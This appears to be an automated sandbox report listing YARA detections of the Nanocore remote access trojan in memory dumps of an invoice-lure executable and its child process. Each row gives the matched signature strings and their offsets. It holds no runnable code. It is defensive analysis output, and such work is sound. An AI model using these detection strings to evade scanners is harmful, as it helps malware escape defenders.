16.0.chmac.exe.415058.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.0.chmac.exe.415058.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.415058.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.2.chmac.exe.395c01e.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d0bf:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0ec:$x2: IClientNetworkHost
16.2.chmac.exe.395c01e.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d0bf:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e19a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0d9:$s5: IClientLoggingHost
16.2.chmac.exe.395c01e.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.395c01e.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d075:$a: NanoCore 0x2d08a:$a: NanoCore 0x2d0bf:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce31:$b: ClientPlugin 0x2ce4c:$b: ClientPlugin
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.37b0e54.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28289:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x282b6:$x2: IClientNetworkHost
14.2.chmac.exe.37b0e54.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28289:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29364:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x282a3:$s5: IClientLoggingHost
14.2.chmac.exe.37b0e54.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.3733258.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.3733258.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.2.chmac.exe.3733258.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.3733258.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.415058.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.415058.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.2.chmac.exe.415058.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.415058.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
16.2.chmac.exe.415058.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.415058.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.2.chmac.exe.415058.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.415058.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.2.chmac.exe.396547d.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c60:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c8d:$x2: IClientNetworkHost
16.2.chmac.exe.396547d.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c60:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d3b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c7a:$s5: IClientLoggingHost
16.2.chmac.exe.396547d.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.38e3258.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.38e3258.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.chmac.exe.38e3258.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.38e3258.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.1.chmac.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.1.chmac.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.1.chmac.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.1.chmac.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.2.chmac.exe.400000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.400000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
14.2.chmac.exe.400000.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.400000.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.415058.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.415058.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.0.chmac.exe.415058.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.415058.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.chmac.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
